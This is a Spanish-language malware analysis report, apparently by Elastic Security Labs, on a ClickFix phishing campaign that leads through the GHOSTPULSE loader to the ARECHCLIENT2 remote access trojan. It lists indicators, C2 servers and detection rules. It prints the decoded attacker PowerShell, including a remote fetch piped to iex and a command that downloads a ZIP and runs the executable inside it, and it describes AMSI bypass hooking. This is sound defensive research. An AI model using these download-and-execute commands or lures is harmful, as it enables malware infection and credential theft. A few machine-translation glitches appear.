Preámbulo
Elastic Security Labs observó que la técnica ClickFix está ganando popularidad para campañas de múltiples etapas que distribuyen diversos malware a través de tácticas de ingeniería social.
Nuestra inteligencia sobre amenazas indica un aumento sustancial en la actividad que aprovecha ClickFix (técnica observada por primera vez) como vector de acceso inicial principal. Esta técnica de ingeniería social engaña a los usuarios para que copien y peguen PowerShell malicioso, lo que provoca la ejecución de malware. Nuestra telemetría rastreó su uso desde el año pasado, incluidas las instancias que llevaron a la implementación de nuevas versiones del cargador GHOSTPULSE. Esto dio lugar a campañas dirigidas a un público amplio que empleaban malware y ladrones de información, como LUMMA y ARECHCLIENT2, una familia observada por primera vez en 2019 pero que ahora está experimentando un aumento significativo de popularidad.
Esta publicación examina una campaña reciente de ClickFix y proporciona un análisis en profundidad de sus componentes, las técnicas empleadas y el malware que finalmente distribuye.
Conclusiones clave
- ClickFix: sigue siendo un método de acceso inicial muy eficaz y frecuente.
- GHOSTPULSE: continúa siendo ampliamente empleado como un cargador de carga útil de múltiples etapas, con un desarrollo continuo con nuevos módulos y técnicas de evasión mejoradas. Cabe destacar que su configuración inicial se entrega dentro de un archivo cifrado.
- ARECHCLIENT2 (SECTOPRAT): Experimentó un aumento considerable en actividad maliciosa a lo largo de 2025.
El gancho inicial: deconstruyendo la ingeniería social de ClickFix
Todo ataque exitoso de múltiples etapas comienza con un punto de apoyo y, en muchas campañas recientes, ClickFix cumplió ese paso inicial. ClickFix aprovecha la psicología humana, transformando interacciones del usuario aparentemente inocuas en una plataforma de lanzamiento para ataques.
En esencia, ClickFix es una técnica de ingeniería social diseñada para manipular a los usuarios para que ejecuten inadvertidamente código malicioso en sus sistemas. Se aprovecha de comportamientos comunes en línea y de tendencias psicológicas y presenta a los usuarios mensajes engañosos, a menudo disfrazados de actualizaciones del navegador, errores del sistema o incluso verificaciones CAPTCHA. El truco es simple pero increíblemente efectivo: en lugar de una descarga directa, se le indica al usuario que copie una "solución" aparentemente inofensiva (que es un comando de PowerShell malicioso) y la pegue directamente en el cuadro de diálogo de ejecución de su sistema operativo. Esta acción aparentemente voluntaria elude muchas defensas perimetrales tradicionales, ya que el usuario inicia el proceso.
ClickFix apareció por primera vez en el panorama de amenazas en marzo de 2024, pero rápidamente ganó fuerza, creciendo en prevalencia a lo largo de 2024 y continuando su ascenso agresivo hasta 2025. Su eficacia radica en explotar la "fatiga de verificación": el hábito subconsciente que desarrollan los usuarios de hacer clic sin pensar en los controles de seguridad. Cuando se enfrentan a un CAPTCHA de aspecto familiar o a un botón urgente de "arreglarlo", muchos usuarios, condicionados por la rutina, simplemente cumplen sin analizar la solicitud subyacente. Esto hace que ClickFix sea un vector de acceso inicial increíblemente poderoso, favorecido por un amplio espectro de actores de amenazas debido a su alta tasa de éxito al violar las defensas iniciales.
Nuestra reciente investigación de Elastic Security sobre EDDIESTEALER proporciona otro ejemplo concreto de la eficacia de ClickFix para facilitar la implementación de malware, lo que subraya aún más su versatilidad y adopción generalizada en el panorama de amenazas.
Nuestra telemetría interna en Elastic corrobora esta tendencia, mostrando un volumen significativo de alertas relacionadas con ClickFix en nuestros entornos observados, particularmente en el primer trimestre de 2025. Observamos un aumento en los intentos en comparación con el trimestre anterior, con un enfoque predominante en la implementación de malware de infección masiva, como RAT e InfoStealers.
El viaje de una campaña de ClickFix hacia ARECHCLIENT2
La técnica ClickFix a menudo sirve como paso inicial de un ataque más grande y de varias etapas. Recientemente analizamos una campaña que muestra claramente esta progresión. Esta operación comienza con un señuelo ClickFix , que engaña a los usuarios para que inicien el proceso de infección. Luego de obtener acceso inicial, la campaña implementa una versión actualizada del GHOSTPULSE Loader (también conocido como HIJACKLOADER, IDATLOADER). A continuación, este cargador incorpora un cargador .NET intermedio. Esta etapa adicional es responsable de entregar la carga útil final: una muestra de ARECHCLIENT2 (SECTOPRAT), cargada directamente en la memoria. Esta cadena de ataque en individuo demuestra cómo los adversarios combinan la ingeniería social con capacidades de carga oculta y múltiples capas de ejecución para robar datos y, en última instancia, obtener el control remoto.
Observamos esta misma campaña en nuestra telemetría el , lo que nos proporcionó una visión directa de su ejecución en el mundo real y la secuencia de sus componentes.
Análisis técnico de la infección
La cadena de infección comienza con una página de phishing que imita una verificación Captcha anti-DDoS de Cloudflare.
Observamos dos infraestructuras (ambas resolver en 50.57.243[.]90) https://clients[.]dealeronlinemarketing[[.]]com/captcha/ y https://clients[.]contology[.]com/captcha/ que entregan la misma carga útil inicial.
La interacción del usuario en esta página inicia la ejecución. GHOSTPULSE actúa como cargador de malware en esta campaña. Elastic Security Labs estuvo siguiendo de cerca este cargador, y nuestra investigación anterior (2023 y 2024) proporcionó una mirada detallada a sus capacidades iniciales.
El sitio web es un script JavaScript muy ofuscado que genera el código HTML y JavaScript, que copia un comando de PowerShell al portapapeles.
Al inspeccionar el código HTML en tiempo de ejecución en un navegador, podemos ver la parte frontal de la página, pero no el script que se ejecuta luego de hacer clic en la casilla de verificación. Verify you are human.
Una solución sencilla es ejecutarlo en un depurador para recuperar la información durante la ejecución. El segundo código JS está ofuscado, pero podemos identificar fácilmente dos funciones interesantes. La primera función, runClickedCheckboxEffects, recupera la dirección IP pública de la máquina consultando https://api.ipify[.]org?format=json, y luego envía la dirección IP a la infraestructura del atacante, https://koonenmagaziner[.]click/counter/<IP_address>, para registrar la infección.
La segunda función copia un comando de PowerShell codificado en base64 al portapapeles.
¿Cuál es lo siguiente cuando se decodifica en base64?
(Invoke-webrequest -URI 'https://shorter[.]me/XOWyT'
-UseBasicParsing).content | iexCuando se ejecuta, obtiene el siguiente script de PowerShell:
Invoke-WebRequest -Uri "https://bitly[.]cx/iddD" -OutFile
"$env:TEMP\ComponentStyle.zip"; Expand-Archive -Path
"$env:TEMP/ComponentStyle.zip" -DestinationPath
"$env:TEMP"; & "$env:TEMP\crystall\Crysta_x86.exe"El proceso de infección observado para esta campaña implica la implementación de GHOSTPULSE de la siguiente manera: después de que el usuario ejecuta el comando de PowerShell copiado por ClickFix, el script inicial obtiene y ejecuta comandos adicionales. Estos comandos de PowerShell descargan un archivo ZIP (ComponentStyle.zip) desde una ubicación remota y luego lo extraen en un directorio temporal en el sistema de la víctima.
El contenido extraído incluye componentes para GHOSTPULSE, específicamente un ejecutable benigno (Crysta_X64.exe) y una biblioteca de vínculo dinámico maliciosa (DllXDownloadManager.dll). Esta configuración emplea la carga lateral de DLL, una técnica en la que el ejecutable legítimo carga la DLL maliciosa. El archivo (Heeschamjet.rc) es el archivo IDAT que contiene las cargas útiles de la siguiente etapa en un formato cifrado
y el archivo Shonomteak.bxi, que está encriptado y es empleado por el cargador para obtener la etapa 2 y la estructura de configuración.
GHOSTPULSE
Etapa 1
GHOSTPULSE es un malware que data de 2023. Recibió numerosas actualizaciones de forma continua, incluida una nueva forma de almacenar su carga útil cifrada en una imagen incrustando la carga útil en los pixeles del PNG, como se detalla en la publicación del blog de investigación 2024 de Elastic, y nuevos módulos de la investigación de Zscaler.
El malware empleado en esta campaña se envió con un archivo cifrado adicional llamado Shonomteak.bxi. Durante la etapa 1 del cargador, se descifra el archivo mediante una operación de suma DWORD con un valor almacenado en el propio archivo.
Luego, el malware extrae el código de la etapa 2 del archivo descifrado Shonomteak.bxi y lo inyecta en una biblioteca cargada empleando la función LibraryLoadA . El nombre de la biblioteca se almacena en el mismo archivo descifrado; en nuestro caso, es vssapi.dll.
Luego, se llama a la función de etapa 2 con un parámetro de estructura que contiene el nombre del archivo PNG IDAT, la configuración de la etapa 2 que estaba dentro del Shonomteak.bxi, descifrado y un campo booleano b_detect_process establecido en True en nuestro caso.
Etapa 2
Cuando el campo booleano b_detect_process se establece en Verdadero, el malware ejecuta una función que verifica una lista de procesos para ver si se están ejecutando. Si se detecta un proceso, la ejecución se retrasa 5 segundos.
En muestras anteriores, analizamos GHOSTPULSE, cuya configuración estaba codificada directamente en el binario. Esta muestra, por otro lado, tiene toda la información necesaria para que el malware funcione correctamente, almacenada en Shonomteak.bxi, , incluyendo:
- Hashes para los nombres de DLL y API de Windows
- Etiqueta IDAT: se emplea para encontrar el inicio de los datos cifrados en el archivo PNG
- Cadena IDAT: que es simplemente “IDAT”
- Hashes de procesos a escanear
Reflexiones finales sobre GHOSTPULSE
GHOSTPULSE tuvo múltiples actualizaciones. El uso del método de encabezado IDAT para almacenar la carga útil cifrada, en lugar del nuevo método que descubrimos en 2024, que emplea pixeles para almacenar la carga útil, puede indicar que el constructor de esta familia mantuvo ambas opciones para compilar nuevas muestras.
Nuestro extractor de configuración realiza la extracción de carga útil empleando ambos métodos y se puede emplear para análisis de masas en muestras. Puede encontrar la herramienta actualizada en nuestro repositorio labs-releases.
UN CLIENTE EQUIPO2
En 2025, se observó un aumento notable en la actividad relacionada con ARECHCLIENT2 (SectopRAT). Esta herramienta de acceso remoto .NET altamente ofuscada, identificada inicialmente en noviembre de 2019 y conocida por sus características de robo de información, ahora está siendo implementada por GHOSTPULSE a través de la técnica de ingeniería social Clickfix. Nuestra investigación anterior documentó el despliegue inicial de GHOSTPULSE empleando ARECHCLIENT2 alrededor de 2023.
La carga útil implementada por GHOSTPULSE en un proceso recién creado es un cargador .NET nativo x86, que a su vez carga ARECHCLIENT2.
El cargador pasa por 3 pasos:
- Parcheo de AMSI
- Extraer y descifrar la carga útil
- Cargando el CLR, luego cargando reflexivamente ARECHCLIENT2
Curiosamente, su gestión de errores con fines de depuración todavía está presente, en forma de cuadros de mensajes que emplean la API MessageBoxA , por ejemplo, cuando no se puede encontrar la sección .tls , se muestra un cuadro de mensaje de error con la cadena "D1" .
La siguiente es una tabla de todos los mensajes de error y su descripción:
| Message | Descripción |
|---|---|
| F1 | LoadLibraryExW el enganche falló |
| F2 | La aplicación del parche AMSI falló |
| D1 | No se puede encontrar la sección .tls |
| W2 | No se pudo cargar CLR |
El malware establece un enlace en la API LoadLibraryExW . Este gancho espera a que se cargue amsi.dll y luego establece otro gancho en AmsiScanBuffer 0, omitiendo efectivamente AMSI.
Luego de esto, el cargador recupera el puntero en la memoria a la sección .tls analizando los encabezados PE. Los primeros 0x40 bytes de esta sección sirven como clave XOR y el resto de los bytes contienen la muestra ARECHCLIENT2 cifrada, que luego el cargador descifra.
Por último, carga .NET Common Language Runtime (CLR) en la memoria con la API de Windows CLRCreateInstance antes de cargar de forma reflexiva ARECHCLIENT2. A continuación se muestra un ejemplo de cómo se realiza.
ARECHCLIENT2 es un poderoso troyano de acceso remoto y ladrón de información, diseñado para atacar un amplio espectro de datos confidenciales de usuarios e información del sistema. Los objetivos principales del malware se centran principalmente en:
- Robo de credenciales y financiero: ARECHCLIENT2 ataca explícitamente billeteras de criptomonedas, contraseñas almacenadas en el navegador, cookies y datos de autocompletado. También apunta a credenciales de FTP, VPN, Telegram, Discord y Steam.
- Creación de perfiles y reconocimiento del sistema: ARECHCLIENT2 recopila detalles extensos del sistema, incluida la versión del sistema operativo, información del hardware, dirección IP, nombre de la máquina y geolocalización (ciudad, país y zona horaria).
- Ejecución de comandos: ARECHCLIENT2 recibe y ejecuta comandos desde su servidor de comando y control (C2), lo que otorga a los atacantes control remoto sobre los sistemas infectados.
El malware ARECHCLIENT2 se conecta a su C2 144.172.97[.]2, que está codificado en el binario como una cadena cifrada, y también recupera su IP C2 secundaria (143.110.230[.]167) desde un enlace pastebin codificado https://pastebin[.]com/raw/Wg8DHh2x.
Análisis de infraestructura
La página captcha maliciosa estaba alojada en dos dominios clients.dealeronlinemarketing[.]com y clients.contology[.]com bajo el URI /captcha y /Client que apuntaba a la siguiente dirección IP 50.57.243[.]90.
Identificamos que ambas entidades están vinculadas a una agencia de publicidad digital con una larga trayectoria operativa. Investigaciones posteriores revelan que la compañía empleó sistemáticamente subdominios de clientes para alojar diversos contenidos, incluidos archivos PDF y formularios, con fines publicitarios.
Evaluamos que el atacante probablemente comprometió el servidor 50.57.243[.]90 y lo está aprovechando explotando la infraestructura existente de la compañía y el alcance publicitario para facilitar una actividad maliciosa generalizada.
Más abajo en la cadena de ataque, el análisis de las IP C2 de ARECHCLIENT2 (143.110.230[.]167 y 144.172.97[.]2) reveló una infraestructura de campaña adicional. Ambos servidores están alojados en diferentes sistemas autónomos, AS14061 y AS14956.
Al voltear sobre un hash de banner compartido ( HOST-BANNER_0_HASH de @ValidinLLC , que es el valor hash de los banners de respuesta del servidor sitio web), se revelaron 120 servidores únicos en una variedad de sistemas autónomos durante los últimos siete meses. De estos 120, 19 fueron previamente etiquetados por varios otros proveedores como “Sectop RAT” (también conocido como ARECHCLIENT2) como se documenta en el repositorio de Maltrail.
La realización de validaciones enfocadas en las últimas ocurrencias (primera ocurrencia luego de junio 1, 2025) contra VirusTotal muestra que los afiliados a la comunidad etiquetaron previamente todos 13 como Sectop RAT C2.
Todos estos servidores tienen configuraciones similares:
- Ejecución de Canonical Linux
- SSH activado
22 - TCP desconocido en
443 - Nginx HTTP en
8080y - HTTP en
9000(puerto C2)
El servicio en el puerto 9000 tiene encabezados de servidor Windows, mientras que los servicios HTTP SSH y NGINX especifican Ubuntu como sistema operativo. Esto sugiere un proxy inverso del C2 para proteger el servidor real manteniendo redirectores front-end desechables.
ARECHCLIENT2 COI:
HOST-BANNER_0_HASH: 82cddf3a9bff315d8fc708e5f5f85f20
Esta es una campaña activa, y esta infraestructura se está construyendo y derribando a un ritmo alto durante los últimos siete meses. Al momento de la publicación, los siguientes nodos C2 siguen activos:
| Value | First Seen | Última vez visto |
|---|---|---|
66.63.187.22 | 15 de junio de 2025 | 15 de junio de 2025 |
45.94.47.164 | 02-06-2025 | 15 de junio de 2025 |
84.200.17.129 | 04-06-2025 | 15 de junio de 2025 |
82.117.255.225 | 14 de marzo de 2025 | 15 de junio de 2025 |
45.77.154.115 | 05-06-2025 | 15 de junio de 2025 |
144.172.94.120 | 2025-05-20 | 15 de junio de 2025 |
79.124.62.10 | 15/05/2025 | 15 de junio de 2025 |
82.117.242.178 | 14 de marzo de 2025 | 15 de junio de 2025 |
195.82.147.132 | 10/04/2025 | 15 de junio de 2025 |
62.60.247.154 | 18-05-2025 | 15 de junio de 2025 |
91.199.163.74 | 03-04-2025 | 15 de junio de 2025 |
172.86.72.81 | 13-03-2025 | 15 de junio de 2025 |
107.189.24.67 | 02-06-2025 | 15 de junio de 2025 |
143.110.230.167 | 08-06-2025 | 15 de junio de 2025 |
185.156.72.80 | 15/05/2025 | 15 de junio de 2025 |
85.158.110.179 | 11-05-2025 | 15 de junio de 2025 |
144.172.101.228 | 13 de mayo de 2025 | 15 de junio de 2025 |
192.124.178.244 | 1 de junio de 2025 | 15 de junio de 2025 |
107.189.18.56 | 27 de abril de 2025 | 15 de junio de 2025 |
194.87.29.62 | 18-05-2025 | 15 de junio de 2025 |
185.156.72.63 | 12 de junio de 2025 | 12 de junio de 2025 |
193.149.176.31 | 08-06-2025 | 12 de junio de 2025 |
45.141.87.249 | 12 de junio de 2025 | 12 de junio de 2025 |
176.126.163.56 | 6 de mayo de 2025 | 12 de junio de 2025 |
185.156.72.71 | 15/05/2025 | 12 de junio de 2025 |
91.184.242.37 | 15/05/2025 | 12 de junio de 2025 |
45.141.86.159 | 15/05/2025 | 12 de junio de 2025 |
67.220.72.124 | 05-06-2025 | 12 de junio de 2025 |
45.118.248.29 | 28/01/2025 | 12 de junio de 2025 |
172.105.148.233 | 03-06-2025 | 10 de junio de 2025 |
194.26.27.10 | 6 de mayo de 2025 | 10 de junio de 2025 |
45.141.87.212 | 08-06-2025 | 08-06-2025 |
45.141.86.149 | 15/05/2025 | 08-06-2025 |
172.235.190.176 | 08-06-2025 | 08-06-2025 |
45.141.86.82 | 13 de diciembre de 2024 | 08-06-2025 |
45.141.87.7 | 13 de mayo de 2025 | 06-06-2025 |
185.125.50.140 | 6 de abril de 2025 | 03-06-2025 |
Conclusión
Esta campaña cibernética de varias etapas aprovecha de manera efectiva la ingeniería social de ClickFix para el acceso inicial, implementando el cargador GHOSTPULSE para entregar un cargador .NET intermedio, que finalmente culmina en la carga útil ARECHCLIENT2 residente en la memoria. Esta cadena de ataque en capas recopila credenciales extensas y datos financieros y del sistema, al tiempo que otorga a los atacantes capacidades de control remoto sobre las máquinas comprometidas.
MITRE ATT&CK
Elastic usa el framework MITRE ATT&CK para documentar tácticas, técnicas y procedimientos comunes que las amenazas persistentes avanzadas emplean contra las redes empresariales.
Táctica
La táctica representa el porqué de una técnica o subtécnica. Es el objetivo táctico del adversario: la razón para realizar una acción.
Técnicas
Las técnicas representan cómo un adversario logra un objetivo táctico mediante la realización de una acción.
- Phishing
- Intérprete de comandos y secuencias de comandos
- Instalación lateral de DLL
- Carga reflexiva
- Interacción del usuario
- Transferencia de herramientas de ingreso
- Detección de información del sistema
- Descubrimiento de procesos
- Robo de cookies de sesión web
Detección de [malware]
Detección
Elastic Defend detecta esta amenaza con las siguientes reglas de protección de comportamiento:
- Ejecución sospechosa del shell de comandos a través de la ejecución de Windows
- Consulta DNS a un dominio de nivel superior sospechoso
- Carga de biblioteca de un archivo escrito por un proxy binario firmado
- Conexión a un servicio sitio web mediante un proxy binario firmado
- Descubrimiento potencial de información del navegador
YARA
Observaciones
En esta investigación se discutieron los siguientes observables.
| Observable | Tipo | Nombre | Referencia |
|---|---|---|---|
clients.dealeronlinemarketing[.]com | dominio | Subdominio Captcha | |
clients.contology[.]com | dominio | Subdominio Captcha | |
koonenmagaziner[.]click | dominio | ||
50.57.243[.]90 | IPv4-ADDR | clients.dealeronlinemarketing[.]com & clients.contology[.]com dirección IP | |
144.172.97[.]2 | IPv4-ADDR | Servidor C&C ARECHCLIENT2 | |
143.110.230[.]167 | IPv4-ADDR | Servidor C&C ARECHCLIENT2 | |
pastebin[.]com/raw/Wg8DHh2x | IPv4-ADDR | Contiene la IP del servidor C&C ARECHCLIENT2 | |
2ec47cbe6d03e6bdcccc63c936d1c8310c261755ae5485295fecac4836d7e56a | SHA-256 | DivXDownloadManager.dll | GHOSTPULSE |
a8ba1e14249cdd9d806ef2d56bedd5fb09de920b6f78082d1af3634f4c136b90 | SHA-256 | Heeschamjiet.rc | Pulso fantasma PNG |
f92b491d63bb77ed3b4c7741c8c15bdb7c44409f1f850c08dce170f5c8712d55 | SHA-256 | CARGADOR DOTNET | |
4dc5ba5014628ad0c85f6e8903de4dd3b49fed65796978988df8c128ba7e7de9 | SHA-256 | UN CLIENTE EQUIPO2 |
Referencias
A lo largo de la investigación anterior se hizo referencia a lo siguiente: